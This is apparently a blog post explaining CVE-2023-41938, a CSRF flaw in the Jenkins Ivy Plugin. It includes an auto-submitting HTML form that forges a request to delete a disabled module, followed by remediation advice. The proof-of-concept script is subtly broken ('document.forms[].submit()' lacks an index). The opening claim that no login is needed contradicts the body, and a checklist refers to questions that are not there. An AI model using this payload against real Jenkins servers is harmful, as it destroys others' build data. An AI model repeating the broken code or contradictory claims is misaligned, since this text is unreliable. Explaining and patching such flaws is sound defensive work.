CVE-2023-41938 - How a CSRF Vulnerability Could Let Attackers Delete Your Disabled Jenkins Ivy Modules

If you are using Jenkins to automate builds and deployments, you may have heard about its huge plugin ecosystem. One of the popular plugins is the Ivy Plugin, which integrates Apache Ivy dependency management into Jenkins. However, lately, a critical security flaw, CVE-2023-41938, was discovered in the plugin that could let attackers delete your disabled modules—without ever logging in.

In this post, I'll break down what this issue means in simple terms, demonstrate how the exploit works, and show you how to protect your Jenkins setup.

What is CVE-2023-41938?

CVE-2023-41938 is a Cross-Site Request Forgery (CSRF) vulnerability in versions 2.5 and earlier of the Jenkins Ivy Plugin. The flaw essentially lets an attacker trick an authenticated user into executing unwanted actions (in this case, deleting disabled Ivy build modules) just by visiting a malicious web page.

References

- Jenkins Security Advisory
- CVE Details

Explaining CSRF in Simple Terms

Imagine you’re logged into your Jenkins dashboard in one browser tab. In another, you innocently click on a link in an email or visit a compromised website. If that website requests an action on your Jenkins server—without your approval—the server believes the request is genuine, because your authentication (cookies/session) is still alive.

That’s the heart of CSRF: attackers perform actions using your identity.

What’s the Jenkins Ivy Plugin Vulnerable To?

Jenkins Ivy Plugin 2.5 and earlier lacked sufficient CSRF protection for certain operations. Specifically, the “delete disabled module” feature was not protected by CSRF tokens.

Result: An attacker could craft a malicious website that, when visited by a Jenkins administrator, silently sends a request to delete a disabled Ivy module—without the admin noticing anything wrong.

Let's see how easy it is to exploit this.

Suppose your Jenkins runs at http://jenkins.yourcompany.com/ and you have a disabled Ivy module with the internal path job/my-ivy-job/module/disabled-module/.

If the administrator is logged into Jenkins (or hasn’t logged out yet), all an attacker needs is to lure them into opening a website containing this HTML snippet:

<!-- cve-2023-41938-exploit.html -->
<html>
  <body>
    <form action="http://jenkins.yourcompany.com/job/my-ivy-job/module/disabled-module/doDelete" method="POST">
      <input type="hidden" name="json" value="{}">
      <input type="hidden" name="Submit" value="Yes">
      <input type="submit" value="Exploit CSRF">
    </form>
    <script>
      // Automatically submit the form to exploit CSRF
      document.forms[].submit();
    </script>
  </body>
</html>

How does this work?

- When an admin opens the attacker’s page, the browser sends a POST request to the Jenkins Ivy Plugin endpoint responsible for deleting modules.

Why Only Disabled Modules?

The vulnerability specifically allows the deletion of Ivy modules that have been disabled, which may seem harmless. But in many workflows, disabled modules are kept for archive, reference, or security reasons.

What Makes This Dangerous?

- No user confirmation: The user doesn’t see or approve the deletion; it happens in the background.
- Chained attacks: Combining this with other vulnerabilities could lead to more severe consequences, like deleting critical pipelines or modifying configurations.

How To Fix CVE-2023-41938

1. Update the Plugin.
The Ivy Plugin maintainers fixed the issue in version 2.6. Upgrade your plugin now via Manage Jenkins > Manage Plugins.

2. Use CSRF Protection Globally.
Jenkins has CSRF Protection which can be enabled under "Configure Global Security". While the plugin should take care of CSRF tokens, having global protection helps avoid similar lapses in other plugins.

3. Audit Your Plugins Regularly.
If a plugin is no longer maintained or in use, disable or remove it. Old plugins are low-hanging fruit for attackers.

Is CSRF protection enabled globally in Jenkins?

If you answered "yes" to the first two and "no" to the third, update and enable protection now.

Takeaways

CSRF flaws are dangerous because they're invisible—you don't see them until it's too late. CVE-2023-41938 is a reminder to keep plugins up-to-date and audit your Jenkins setup often.

Useful Links

- Official Jenkins Security Advisory for CVE-2023-41938
- Jenkins Ivy Plugin Homepage
- How To Enable CSRF Protection in Jenkins

Stay secure. Stay updated. Don't let attackers press your delete buttons!

*If you found this post helpful, share it with your team and check out our guides on Jenkins security for more tips.*

Timeline

Published on: 09/06/2023 13:15:00 UTC
Last modified on: 09/11/2023 17:52:00 UTC